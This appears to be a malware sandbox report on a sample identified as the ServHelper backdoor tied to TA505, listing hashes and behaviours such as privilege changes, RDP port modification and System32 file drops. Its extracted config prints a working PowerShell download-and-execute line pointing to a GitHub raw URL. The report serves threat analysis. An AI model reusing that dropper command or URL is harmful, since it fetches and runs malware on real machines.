General

  • Target

    bfe0ac25eeeb759f7c8e06229c7313a2

  • Size

    5.9MB

  • Sample

    240311-fc7w8acc38

  • MD5

    bfe0ac25eeeb759f7c8e06229c7313a2

  • SHA1

    199c1fbd29f9ec98b83464763dac63ef80998bb3

  • SHA256

    be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c

  • SHA512

    a0f3b477de1603d7e032608692857a4865059ba61ae1276334f281970a1484a6c81463fba2a2bbc9821c016e06e206d621fdb97e8743fc60e3515fba88997a72

  • SSDEEP

    49152:tvGIuxrb/TkvO90dL3BmAFd4A64nsfJ1XU59mMJETIR1iVhYOxbJBKqKhmYYMNn9:tvGfXdmAQQQQQQQQQQQQQ

Malware Config

Extracted

Language
ps1
Deobfuscated
1
invoke-expression (new-object net.webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1")
2
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Targets

    • Target

      bfe0ac25eeeb759f7c8e06229c7313a2

    • Size

      5.9MB

    • MD5

      bfe0ac25eeeb759f7c8e06229c7313a2

    • SHA1

      199c1fbd29f9ec98b83464763dac63ef80998bb3

    • SHA256

      be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c

    • SHA512

      a0f3b477de1603d7e032608692857a4865059ba61ae1276334f281970a1484a6c81463fba2a2bbc9821c016e06e206d621fdb97e8743fc60e3515fba88997a72

    • SSDEEP

      49152:tvGIuxrb/TkvO90dL3BmAFd4A64nsfJ1XU59mMJETIR1iVhYOxbJBKqKhmYYMNn9:tvGfXdmAQQQQQQQQQQQQQ

    • ServHelper

      ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

    • Grants admin privileges

      Uses net.exe to modify the user's privileges.

    • Blocklisted process makes network request

    • Modifies RDP port number used by Windows

    • Possible privilege escalation attempt

    • Sets DLL path for service in the registry

    • Loads dropped DLL

    • Modifies file permissions

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.